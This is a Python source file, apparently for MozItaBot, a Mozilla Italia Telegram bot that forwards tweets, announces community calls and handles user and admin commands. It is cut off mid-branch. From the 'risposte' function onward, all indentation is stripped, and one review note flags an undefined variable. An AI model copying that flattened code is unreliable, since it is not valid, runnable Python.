def updateJSON(data, path):
    """Serialize data as pretty-printed, key-sorted JSON and write it to path."""
    jsonstr = json.dumps(data, sort_keys=True, indent=4)
    # Context manager guarantees the handle is flushed and closed (was leaked).
    with open(path, "w") as jsonfile:
        jsonfile.write(jsonstr)
def get_last_id_posted():
    """Return the single saved Twitter post id from last_twitter_id.json.

    Exits the process when the file does not contain exactly one id.
    """
    last_twitter_id_path = "last_twitter_id.json"
    saved_ids = load_list_from_path(last_twitter_id_path)
    if len(saved_ids) != 1:
        print("Errore. Non c'e' un id dell'ultimo post salvato da Twitter nel file last_twitter_id.json")
        print("Rinomina il file last_twitter_id-sample.json, inserisci l'id dell'ultimo post e riprova")
        exit()
    return saved_ids[0]
# init almost everything needed by Twitter
def twitter_init(config_parser, starttime):
    """Read Twitter credentials, verify the source account and start polling.

    Exits the process when the configured source account does not exist.
    The actual polling runs forever in a background thread (fetch_twitter).
    """
    # Twitter API credentials from the [twitter] section of config.ini.
    CONSUMER_KEY = safe_conf_get(config_parser, "twitter", "CONSUMER_KEY")
    CONSUMER_SECRET = safe_conf_get(config_parser, "twitter", "CONSUMER_SECRET")
    ACCESS_TOKEN = safe_conf_get(config_parser, "twitter", "ACCESS_TOKEN")
    ACCESS_SECRET = safe_conf_get(config_parser, "twitter", "ACCESS_SECRET")
    TWITTER_REFRESH_TIME = float(safe_conf_get(config_parser, "twitter", "TWITTER_REFRESH_TIME"))
    TWITTER_SOURCE_ACCOUNT = safe_conf_get(config_parser, "twitter", "TWITTER_SOURCE_ACCOUNT")
    # OAuth 1.0a authentication handshake.
    auth = ty.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
    auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
    twitter_api = ty.API(auth)
    # Fail fast when the source account name is wrong.
    try:
        twitter_api.get_user(TWITTER_SOURCE_ACCOUNT)
    except Exception:
        print("Nome utente Twitter non valido! Assicurati di aver inserito il nome utente giusto e riprova!")
        log("Nome utente Twitter non valido! Assicurati di aver inserito il nome utente giusto e riprova!", True)
        exit()
    # Pair of [twitter_username, last_forwarded_post_id].
    user_params = [TWITTER_SOURCE_ACCOUNT, get_last_id_posted()]
    # Background poller; runs until the process exits.
    threading.Thread(target=fetch_twitter, args=(twitter_api, starttime, TWITTER_REFRESH_TIME, NEWS_CHANNEL, user_params)).start()
# social function: updates twitter -- used by thread
def fetch_twitter(twitter_api, starttime, seconds=300.0, channel_username="@mozitanews", user_params=["MozillaItalia", '1']):
    """Poll the source account's tweets forever and forward new ones to a channel."""
    channel_username = fix_username(channel_username)
    # NOTE: the string below is a no-op literal, not a docstring -- it sits
    # after the first statement of the function body.
    """
    function to fetch MozillaItalia's Tweets and post them on a channel
    """
    # NOTE(review): 'channels_list' is not defined anywhere in this module --
    # presumably it is loaded elsewhere from channel_list.json; confirm,
    # otherwise this line raises NameError at runtime.
    if channel_username not in channels_list:
        print("Errore! Il canale destinazione dove inoltrare i nuovi post di Twitter è errato, non esiste, non esiste nella channel_list.json o il bot non ha il permesso di scrivere! Assicurati di aver specificato l'username giusto in config.ini")
        exit()
    while True:
        # Re-read the last forwarded id each cycle so external edits are honored.
        user_params[1] = get_last_id_posted()
        get_user_tweet(twitter_api, channel_username, user_params)
        # Sleep until the next multiple of `seconds` measured from starttime.
        time.sleep(seconds - ((time.time() - starttime) % seconds))
# get tweets of a user and post it on a channel
def get_user_tweet(twitter_api, channel_name, user_params=None):
    """Fetch the newest tweet of a user and forward it to a Telegram channel.

    Parameters
    ----------
    twitter_api : tweepy.API
        Authenticated Twitter API handle.
    channel_name : str
        Destination Telegram channel (with leading @).
    user_params : list
        [twitter_username, last_forwarded_post_id]; defaults to
        ["MozillaItalia", '1'] when omitted.
    """
    global tweet
    if user_params is None:
        # Avoid a shared mutable default argument.
        user_params = ["MozillaItalia", '1']
    # Current date/time for the console time stamp.
    now = datetime.now()
    date_time = now.strftime("%d-%m-%Y %H:%M:%S")
    user = user_params[0]
    old_id = user_params[1]
    # Fetch only the most recent entry of the user's timeline.
    r = twitter_api.user_timeline(user, count=1, tweet_mode='extended')
    last_tweet_id = r[0].id
    status = twitter_api.get_status(last_tweet_id, tweet_mode="extended")
    # Forward only when the id differs from the last one already posted.
    if last_tweet_id != old_id:
        # Retweets carry the original text under retweeted_status.
        try:
            tweet = "RT: " + status.retweeted_status.full_text
        except AttributeError:  # Not a Retweet
            tweet = status.full_text
        tweet_url = "https://twitter.com/" + user + "/status/" + str(status.id)
        # Send the tweet text to the news channel with a "view tweet" button.
        try:
            bot.sendMessage(channel_name,
                            tweet,
                            parse_mode="HTML",
                            reply_markup=InlineKeyboardMarkup(inline_keyboard=[
                                [InlineKeyboardButton(
                                    text=frasi["view tweet"],
                                    url=tweet_url)]]))
            # Persist the new last-forwarded id.
            try:
                # Context manager fixes the previous unclosed-handle leak,
                # which could leave the file unflushed.
                with open("last_twitter_id.json", "w") as fd:
                    fd.write("[" + str(r[0].id) + "]")
            except Exception:
                print("Errore aggiornamento file!")
                exit()
            print("[" + date_time + "] " + "Tweet -> " + tweet)
        except Exception as exception_value:
            print("Excep:29 -> " + str(exception_value))
            log("Except:29 ->" + str(exception_value), True)
    else:
        print("[" + date_time + "] " + "Nessun nuovo Tweet. ")
# [TWITTER]: init everything and start
# twitter_init(config_parser, starttime)
##################################################################
# Last getUpdates() response; prepended to log entries when err=True (see log()).
response = ""
# Italian month names, indexed by month number - 1.
listaMesi = [
    "Gennaio",
    "Febbraio",
    "Marzo",
    "Aprile",
    "Maggio",
    "Giugno",
    "Luglio",
    "Agosto",
    "Settembre",
    "Ottobre",
    "Novembre",
    "Dicembre"]
# Computes the first Friday of the month (used to schedule the community call).
def first_friday_of_the_month(year, month):
    """Return the day of the month (1-31) that is its first Friday."""
    for day, weekday in calendar.Calendar().itermonthdays2(year, month):
        if weekday != calendar.FRIDAY:
            continue
        # A leading padding slot (day == 0) means the first real Friday
        # falls exactly one week later.
        return day if day != 0 else day + 7
def remove_user_from_avvisi_allusers_lists(chat_id, userid_to_remove):
    """Remove a user id from avvisi_on_list and all_users and persist both files.

    chat_id is currently unused; a notification send was disabled:
    # bot.sendMessage(chat_id,
    #     "‼️❌ <a href='tg://user?id=" + str(userid_to_remove) + "'>" +
    #     str(userid_to_remove) + "</a> rimosso dalla lista.",
    #     parse_mode="HTML")
    """
    try:
        # Drop from the "notifications on" list, if present, and rewrite its file.
        if (userid_to_remove in avvisi_on_list):
            avvisi_on_list.remove(userid_to_remove)
            with open(avvisi_on_list_path, "wb") as file_with:
                file_with.write(json.dumps(
                    avvisi_on_list).encode("utf-8"))
        # Drop from the global user list, if present, and rewrite its file.
        if (userid_to_remove in all_users):
            all_users.remove(userid_to_remove)
            with open(all_users_path, "wb") as file_with:
                file_with.write(json.dumps(
                    all_users).encode("utf-8"))
        testo_to_print = str(
            userid_to_remove) + " rimosso dalla lista all_users (ed eventualmente dalla avvisi_list)"
        print(testo_to_print)
        log(testo_to_print, False)
    except Exception as exception_value:
        print("Excep:24 -> " + str(exception_value))
        log("Except:24 ->" + str(exception_value), True)
# send a message in a channel
def send_message_channel(channel_name, messaggio, chat_id, optional_text = ""):
    """Post messaggio to a channel and confirm the outcome to chat_id.

    On failure: if optional_text is non-empty it is used as a custom error
    notice prefix, otherwise a generic troubleshooting message is sent.
    """
    try:
        bot.sendMessage(channel_name.lower(),
                        messaggio,
                        parse_mode="HTML")
        bot.sendMessage(
            chat_id,
            "Messaggio inviato correttamente sul canale <code>" + channel_name.lower() + "</code>" +
            ".\n\nIl messaggio inviato è:\n" +
            messaggio,
            parse_mode="HTML")
    except Exception as exception_value:
        print("Excep:25 -> " + str(exception_value))
        log("Except:25 ->" + str(exception_value), True)
        # NOTE(review): optional_text is only consulted on the error path --
        # it reads as a custom error-notice prefix; confirm that is intended.
        if optional_text != "":
            bot.sendMessage(
                chat_id,
                optional_text + "canale <code>" + channel_name.lower() + "</code>.\n",
                parse_mode="HTML"
            )
        else:
            bot.sendMessage(
                chat_id,
                "Si è verificato un errore per il canale <code>" + channel_name.lower() + "</code>.\n" +
                "Controlla che: \n" +
                "- il bot abbia i privilegi giusti\n" +
                "- BotFather sia settato correttamente\n" +
                "- hai aggiunto l'ID nella lista canali (con la @)\n\n" +
                "Se ancora hai problemi potrebbe trattarsi di un errore momentaneo.\n" +
                "Riprova più tardi!",
                parse_mode="HTML"
            )
def send_log(nome_file, chat_id):
    """Send a log file from ./history_mozitabot to the chat, if it exists.

    Parameters
    ----------
    nome_file : str
        File name inside the history_mozitabot directory.
    chat_id : int
        Destination Telegram chat.
    """
    log_path = "./history_mozitabot/" + nome_file
    if os.path.exists(log_path):
        bot.sendMessage(chat_id, "<i>Invio del file " +
                        nome_file + " in corso</i>", parse_mode="HTML")
        # Context manager closes the handle after Telegram consumes it
        # (the previous bare open() leaked it).
        with open(log_path, "rb") as log_file:
            bot.sendDocument(chat_id, log_file)
    else:
        bot.sendMessage(
            chat_id, "Il file <i>" + nome_file + "</i> non esiste.", parse_mode="HTML")
def risposte(msg):
global data_salvataggio
global localtime
if isinstance(localtime, str):
localtime = datetime.now()
localtime = localtime.strftime("%d/%m/%y %H:%M:%S")
type_msg = "NM" # Normal Message
status_user = "-" # inizializzazione dello 'status' dell'utente {"A"|"-"}
# Admin, Other
global frasi # frasi è il dictionary globali che contiene tutte le frasi da visualizzare
global response
global adminlist
response = bot.getUpdates()
if not liste["adminlist"] or not liste["adminlist"] == {}:
adminlist = [ int(admin) for admin in list(liste["adminlist"].keys()) ] # definita in liste.json
else:
# nel caso in cui non dovesse esistere alcuna lista admin imposta staticamente l'userid di Sav22999
# -> così da poter confermare anche altri utenti anche se ci sono 'malfunzionamenti' (NON DOVREBBERO ESSERCENE!)
adminlist = [240188083]
# caricamento degli eventi gestiti
eventi_list = {}
eventi_list = telegram_events.events(msg, ["LK", "NM"], response)
text = eventi_list["text"]
type_msg = eventi_list["type_msg"]
query_id = "-"
if type_msg == "BIC" and "id" in msg:
query_id = msg["id"]
link_regolamento = "https://github.com/MozillaItalia/mozitaantispam_bot/wiki/Regolamento"
user_id = msg['from']['id']
if user_id in adminlist:
status_user = "A"
nousername = False
if "username" in msg['from']:
user_name = msg['from']['username']
else:
user_name = "[*NessunUsername*]"
nousername = True
if "chat" not in msg:
msg = msg["message"]
chat_id = msg['chat']['id']
if datetime.now().month == 12:
anno_call = str(datetime.now().year + 1)
mese_call = listaMesi[0]
giorno_call = str(first_friday_of_the_month(int(anno_call), 1))
else:
anno_call = str(datetime.now().year)
giorno_call = first_friday_of_the_month(
int(anno_call), datetime.now().month)
if datetime.now().day >= giorno_call:
mese_call = datetime.now().month + 1
giorno_call = str(first_friday_of_the_month(
int(anno_call), datetime.now().month + 1))
else:
mese_call = datetime.now().month
giorno_call = str(giorno_call)
mese_call = listaMesi[mese_call - 1]
# non è possibile utilizzare la funzione
# datetime.now().(month+1).strftime("%B") perché lo restituisce in
# inglese
home = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vai_a_home"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
feedback = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_feedback"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(text=frasi["button_feedback2"],
url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
start = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_start"],
callback_data='/help')],
[InlineKeyboardButton(text=frasi["button_start2"],
callback_data='/supporto')],
])
supporto = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_support"], url='https://t.me/joinchat/BCql3UMy26nl4qxuRecDsQ'),
InlineKeyboardButton(text=frasi["button_support2"], callback_data='/forum')],
[InlineKeyboardButton(text=frasi["button_support3"],
url='https://forum.mozillaitalia.org/index.php?board=9.0')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
help = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_testo_gruppi"], callback_data='/gruppi'),
InlineKeyboardButton(
text=frasi["button_testo_social"], callback_data='/social'),
InlineKeyboardButton(text=frasi["button_testo_supporto"], callback_data='/supporto')],
[InlineKeyboardButton(text=frasi["button_testo_avvisi"], callback_data='/avvisi'),
InlineKeyboardButton(
text=frasi["button_testo_call"], callback_data='/meeting'),
InlineKeyboardButton(text=frasi["button_testo_progetti_attivi"], callback_data='/progetti')],
[InlineKeyboardButton(text=frasi["button_testo_vademecum"], callback_data='/vademecum'),
InlineKeyboardButton(
text=frasi["button_testo_regolamento"], callback_data='/regolamento'),
InlineKeyboardButton(text=frasi["button_testo_info"], callback_data='/info')],
[InlineKeyboardButton(text=frasi["button_feedback"],
callback_data='/feedback')],
])
gruppi = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_testo_home"], url=GRUPPI_URL['home']),
InlineKeyboardButton(text=frasi["button_testo_news"], url=GRUPPI_URL['news'])],
[InlineKeyboardButton(text=frasi["button_testo_developers"], url=GRUPPI_URL['developers']),
InlineKeyboardButton(text=frasi["button_testo_L10n"], url=GRUPPI_URL["l10n"])],
[InlineKeyboardButton(text=frasi["button_testo_design_marketing"], url=GRUPPI_URL["design_marketing"])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
developers = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_developers"],
url=GRUPPI_URL['developers'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
design_marketing = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_design_marketing"],
url=GRUPPI_URL['design_marketing'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
L10n = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_L10n"],
url=GRUPPI_URL['l10n'])],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
vademecum = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vg"], callback_data='/vademecumGenerale'),
InlineKeyboardButton(text=frasi["button_vt"], callback_data='/vademecumTecnico')],
[InlineKeyboardButton(text=frasi["button_cv"], callback_data='/vademecumCV')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
news = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_news"],
url='https://t.me/mozItaNews')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
forum = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_forum"],
url='https://forum.mozillaitalia.org/')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
call = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_vai_a_canale_youtube"],
url='https://www.youtube.com/channel/UCsTquqVS0AJxCf4D3n9hQ1w')],
[InlineKeyboardButton(text=frasi["button_call2"],
callback_data='/prossimoMeeting')],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
load_progetti = [ [InlineKeyboardButton(
text=str(proj), url=liste["progetti"][proj])] for proj in list(liste["progetti"].keys()) ]
load_progetti.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
progetti = InlineKeyboardMarkup(inline_keyboard=load_progetti)
load_progettimozita = []
load_progettimozita = [ [InlineKeyboardButton(
text=str(proj), url=liste["progetti_mozita"][proj])] for proj in list(liste["progetti_mozita"].keys()) ]
load_progettimozita.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
progettimozita = InlineKeyboardMarkup(inline_keyboard=load_progettimozita)
regolamento = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_regolamento"],
url=link_regolamento)],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
avvisi = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_avvisi"], callback_data="/avvisiOn"),
InlineKeyboardButton(text=frasi["button_avvisi2"], callback_data="/avvisiOff")],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
# aggiungere instagram in futuro
load_social = []
load_social = [ [InlineKeyboardButton(
text=social, url=liste["social"][social])] for social in list(liste["social"].keys()) ]
load_social.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
social = InlineKeyboardMarkup(inline_keyboard=load_social)
admin = False
collaboratori_stampa = ""
for k, v in liste["collaboratori"].items():
collaboratori_stampa += k + " - " + v + "\n"
if chat_id not in all_users:
all_users.append(chat_id)
avvisi_on_list.append(user_id)
try:
with open(all_users_path, "wb") as file_with:
file_with.write(json.dumps(all_users).encode("utf-8"))
except Exception as exception_value:
print("Excep:03 -> " + str(exception_value))
log("Except:03 ->" + str(exception_value), True)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
except Exception as exception_value:
print("Excep:04 -> " + str(exception_value))
log("Except:04 ->" + str(exception_value), True)
if user_id in avvisi_on_list:
stato_avvisi = frasi["avvisiStatoOn"]
else:
stato_avvisi = frasi["avvisiStatoOff"]
if text.lower() == "/home":
bot.sendMessage(chat_id, frasi["home"],
reply_markup=home, parse_mode="HTML")
elif text.lower() == "/start":
bot.sendMessage(chat_id, frasi["start"], parse_mode="HTML")
bot.sendMessage(chat_id, frasi["start2"],
reply_markup=start, parse_mode="HTML")
if nousername:
bot.sendMessage(
chat_id, frasi["start_nousername"], parse_mode="HTML")
elif text.lower() == "/supporto":
bot.sendMessage(chat_id, frasi["supporto"],
reply_markup=supporto, parse_mode="HTML")
elif text.lower() == "/gruppi":
bot.sendMessage(chat_id, frasi["gruppi"],
reply_markup=gruppi, parse_mode="HTML")
elif text.lower() == "/vademecum":
bot.sendMessage(chat_id, frasi["vademecum"],
reply_markup=vademecum, parse_mode="HTML")
elif text.lower() == "/vademecumGenerale".lower():
bot.sendMessage(chat_id, frasi["invio_vg_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("VG.pdf", "rb"))
elif text.lower() == "/vademecumTecnico".lower():
bot.sendMessage(chat_id, frasi["invio_vt_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("VT.pdf", "rb"))
elif text.lower() == "/vademecumCV".lower():
bot.sendMessage(chat_id, frasi["invio_cv_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("CV.pdf", "rb"))
elif text.lower() == "/feedback":
bot.sendMessage(chat_id, frasi["feedback"],
reply_markup=feedback, parse_mode="HTML")
elif text.lower() == "/help" or text == "/aiuto":
bot.sendMessage(chat_id, frasi["help"], parse_mode="HTML")
bot.sendMessage(chat_id, frasi["help2"],
reply_markup=help, parse_mode="HTML")
elif text.lower() == "/news":
bot.sendMessage(chat_id, frasi["news"],
reply_markup=news, parse_mode="HTML")
elif text.lower() == "/info":
bot.sendMessage(
chat_id,
str(
((frasi["info"]).replace(
"{{**versione**}}",
str(versione))).replace(
"{{**ultimo_aggiornamento**}}",
str(ultimo_aggiornamento))).replace(
"{{**collaboratori_stampa**}}",
str(collaboratori_stampa)),
parse_mode="HTML")
elif text.lower() == "/forum":
bot.sendMessage(chat_id, frasi["forum"],
reply_markup=forum, parse_mode="HTML")
elif text.lower() == "/developers":
bot.sendMessage(chat_id, frasi["developers"],
reply_markup=developers, parse_mode="HTML")
elif text.lower() == "/dem":
bot.sendMessage(chat_id, frasi["design_marketing"],
reply_markup=design_marketing, parse_mode="HTML")
elif text.lower() == "/l10n":
bot.sendMessage(chat_id, frasi["L10n"],
reply_markup=L10n, parse_mode="HTML")
elif text.lower() == "/call" or text.lower() == "/meeting":
bot.sendMessage(chat_id, frasi["call"],
reply_markup=call, parse_mode="HTML")
elif text.lower() == "/prossimacall" or text.lower() == "/prossimoMeeting".lower():
bot.sendMessage(
chat_id,
str(
((frasi["prossima_call"]).replace(
"{{**giorno_call**}}",
str(giorno_call))).replace(
"{{**mese_call**}}",
str(mese_call))).replace(
"{{**anno_call**}}",
str(anno_call)),
parse_mode="HTML")
elif text.lower() == "/progetti":
bot.sendMessage(chat_id, frasi["progetti"],
reply_markup=progetti, parse_mode="HTML")
bot.sendMessage(
chat_id,
frasi["progetti2"],
reply_markup=progettimozita,
parse_mode="HTML")
elif text.lower() == "/regolamento":
bot.sendMessage(chat_id, frasi["regolamento"],
reply_markup=regolamento, parse_mode="HTML")
elif text.lower() == "/avvisi":
bot.sendMessage(chat_id, str(frasi["avvisi"]).replace(
"{{**stato_avvisi**}}", str(stato_avvisi)), reply_markup=avvisi, parse_mode="HTML")
elif text.lower() == "/avvisiOn".lower():
if not (user_id in avvisi_on_list):
avvisi_on_list.append(user_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
bot.sendMessage(chat_id, frasi["avvisiOn"], parse_mode="HTML")
except Exception as exception_value:
print("Excep:05 -> " + str(exception_value))
log("Except:05 ->" + str(exception_value), True)
bot.sendMessage(chat_id, frasi["avvisiOn2"], parse_mode="HTML")
else:
bot.sendMessage(chat_id, frasi["avvisiOn3"], parse_mode="HTML")
elif text.lower() == "/avvisiOff".lower():
if user_id in avvisi_on_list:
avvisi_on_list.remove(user_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
bot.sendMessage(chat_id, frasi["avvisiOff"], parse_mode="HTML")
except Exception as exception_value:
print("Excep:06 -> " + str(exception_value))
log("Except:06 ->" + str(exception_value), True)
bot.sendMessage(
chat_id, frasi["avvisiOff2"], parse_mode="HTML")
else:
bot.sendMessage(chat_id, frasi["avvisiOff3"])
elif text.lower() == "/social".lower():
bot.sendMessage(chat_id, frasi["social"],
reply_markup=social, parse_mode="HTML")
elif "/admin" in text.lower():
if status_user == "A":
if type_msg == "LK":
admin = True
else:
bot.sendMessage(chat_id, frasi["non_sei_admin"], parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
frasi["comando_non_riconosciuto"],
reply_markup=start,
parse_mode="HTML")
if type_msg == "BIC" and query_id != "-":
bot.answerCallbackQuery(query_id,
cache_time=0) # se voglio mostrare un messaggio a scomparsa: bot.answerCallbackQuery(chat_id, text="Testo (0-200 caratteri)" cache_time=0)
if admin:
# CONTROLLO AZIONI ADMIN
azione = list(text.split(" "))
admin_err1 = False
if azione[0].lower() == "/admin" and len(azione) >= 1:
if len(azione) == 1 or (azione[1].lower() == "help" and len(azione) == 2):
# Elenco azioni
bot.sendMessage(chat_id,
"Questo è l'elenco dei comandi che puoi eseguire:\n" +
"\n\n" +
"<b>Generali</b>:\n"
"- <code>/admin avviso |Messaggio da inviare|</code>\n" +
"- <code>/admin avviso preview |Messaggio da inviare|</code>\n <i>Anteprima del messaggio da inviare, per verificare che tutto venga visualizzato correttamente</i>\n" +
"- <code>/admin all users |Messaggio importante da inviare|</code>\n <i>Solo per messaggi importanti, altrimenti usare 'avviso'</i>\n" +
"\n" +
"<b>Gestione lista degli iscritti agli avvisi</b>\n" +
"- <code>/admin avvisi list mostra</code>\n" +
"- <code>/admin avvisi list aggiungi |Id chat|</code>\n" +
"- <code>/admin avvisi list elimina |Id chat|</code>\n" +
"\n" +
"<b>Gestione canali</b>:\n" +
"- <code>/admin canale mostra</code>\n" +
"- <code>/admin canale aggiungi |Username canale|</code>\n" +
"- <code>/admin canale elimina |Username canale|</code>\n" +
"- <code>/admin canale preview |Username canale| |Messaggio da inviare in un canale|</code>\n <i>Anteprima del messaggio da inviare, per verificare che tutto venga visualizzato correttamente</i>\n" +
"- <code>/admin canale |Username canale| |Messaggio da inviare in un canale|</code>\n" +
"- <code>/admin canale broadcast |Messaggio da inviare in tutti i canali|</code>\n" +
"\n" +
"<b>Gestione progetti (Mozilla)</b>:\n" +
"- <code>/admin progetto aggiungi |Nome progetto da aggiungere| |LinkProgetto|</code>\n" +
"- <code>/admin progetto modifica |Nome progetto da modificare| |LinkProgettoModificato|</code>\n" +
"- <code>/admin progetto elimina |Nome progetto da eliminare|</code>\n" +
"\n" +
"<b>Gestione progetti Mozilla Italia</b>:\n" +
"- <code>/admin progetto mozita aggiungi |Nome progetto comunitario da aggiungere| |LinkProgetto|</code>\n" +
"- <code>/admin progetto mozita modifica |Nome progetto comunitario da modificare| |LinkProgettoModificato|</code>\n" +
"- <code>/admin progetto mozita elimina |Nome progetto comunitario da eliminare|</code>\n" +
"\n" +
"<b>Gestione collaboratori di MozItaBot</b>:\n" +
"- <code>/admin collaboratore aggiungi |Nome Cognome (@usernameTelegram)|</code>\n" +
"- <code>/admin collaboratore elimina |Nome Cognome (@usernameTelegram)|</code>\n" +
"\n" +
"<b>Scaricare file log di MozItaBot</b>:\n" +
"- <code>/admin scarica |ANNO| |MESE| |GIORNO|</code>\n" +
"- <code>/admin scarica today</code>\n" +
"- <code>/admin scarica yesterday</code>\n" +
"\n" +
"<b>Esempi:</b>\n" +
"- <code>/admin avviso Messaggio di prova</code>\n" +
"- <code>/admin call aggiungi Nome call di esempio 2019 https://mozillaitalia.it</code>\n" +
"- <code>/admin scarica 2019 10 09</code>",
parse_mode="HTML")
# ======
# AVVISO
# ======
elif azione[1].lower() == "avviso" and len(azione) >= 3:
# Azioni sugli avvisi
del azione[0]
del azione[0]
# Syntax : /admin avviso preview |Messaggio da inviare|
if azione[0].lower() == "preview" and len(azione) >= 4:
del azione[0]
messaggio = ' '.join(azione)
try:
bot.sendMessage(
chat_id,
"<b>‼️‼️ ||PREVIEW DEL MESSAGGIO|| ‼️‼</b>️\n\n" +
messaggio +
"\n\n--------------------\n" +
frasi["footer_messaggio_avviso"],
parse_mode="HTML")
except Exception as exception_value:
print("Excep:23 -> " + str(exception_value))
log("Except:23 ->" + str(exception_value), True)
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: il messaggio contiene degli errori di sintassi.\n" +
"Verificare di avere <b>chiuso</b> tutti i tag usati.",
parse_mode="HTML")
else:
# Syntax : /admin avviso |Messaggio da inviare|
messaggio = ' '.join(azione)
error08 = False
bot.sendMessage(
chat_id,
"<i>Invio del messaggio in corso...\nRiceverai un messaggio quando finisce l'invio.</i>",
parse_mode="HTML")
remove_these_users = []
for value_for in avvisi_on_list:
time.sleep(.3)
try:
bot.sendMessage(
value_for,
messaggio +
"\n\n--------------------\n" +
frasi["footer_messaggio_avviso"],
parse_mode="HTML")
print(" >> Messaggio inviato alla chat: " + str(value_for))
'''
bot.sendMessage(
chat_id,
"✔️ Messaggio inviato alla chat: <a href='tg://user?id=" + str(value_for) + "'>" +
str(value_for) + "</a>",
parse_mode="HTML")
'''
except Exception as exception_value:
print("Excep:08 -> " + str(exception_value))
log("Except:08 ->" +
str(exception_value), True)
remove_these_users.append(value_for)
error08 = True
for value_to_remove in remove_these_users:
remove_user_from_avvisi_allusers_lists(
chat_id, value_to_remove)
if (not error08):
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente a tutti gli utenti iscritti alle news.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente ad alcune chat.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
# canale => gestisce i canali
# syntax: /admin canale mostra
# OPPURE
# syntax: /admin canale lista
elif azione[1].lower() == "canale" and len(azione) >= 3:
del azione[0]
del azione[0]
# shows channels saved on file
# everytime it reloads the file to avoid uncommon situations
if azione[0] == "mostra" or azione[0] == "lista" and len(azione) == 1:
channels_list = list(liste["channels"].keys())
bot.sendMessage(
chat_id, "Lista canali disponibili:\n{}".format(channels_list))
# preview messaggio canale => non invia il messaggio
# syntax: /admin canale preview |canale||messaggio|
elif len(azione) >= 4 and azione[0].lower() == "preview":
# delete all the part not-related to the message (preview)
del azione[0]
# saves channel name
ch = azione[0]
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
try:
bot.sendMessage(
chat_id,
"<b>== PREVIEW DEL MESSAGGIO ==</b>️\n" +
"<i>Questo messaggio sarà inoltrato in: <code>" + ch + "</code></i>️\n\n"+
messaggio + "\n",
parse_mode="HTML")
except Exception as exception_value:
print("Excep:26 -> " + str(exception_value))
log("Except:26 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: il messaggio contiene degli errori di sintassi.\n" +
"Verificare di avere <b>chiuso</b> tutti i tag usati.",
parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: La preview è vuota! Assicurati di inserire un messaggio " +
"e riprova",
parse_mode="HTML")
print("La preview non può essere vuota.")
# adds a channel in a file
# syntax /admin canale aggiungi |username canale | descrizione |
elif azione[0].lower() == "aggiungi" and len(azione) == 2:
# lets fix the username by adding @ at the beginning if not present
fixed_username = fix_username(azione[1]).lower()
# manage the case the user doesn't put anything
# TODO: let the user choice the name
# lets check if username is not present in the channel_list
if fixed_username not in liste["channels"]:
try:
liste["channels"][fixed_username] = "undefined"
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Canale <code>{}</code> aggiunto correttamente".format(fixed_username), parse_mode="HTML")
except Exception as exception_value:
print("Excep:28 -> {}".format(exception_value))
log("Except:28 -> {}".format(exception_value), True)
bot.sendMessage(
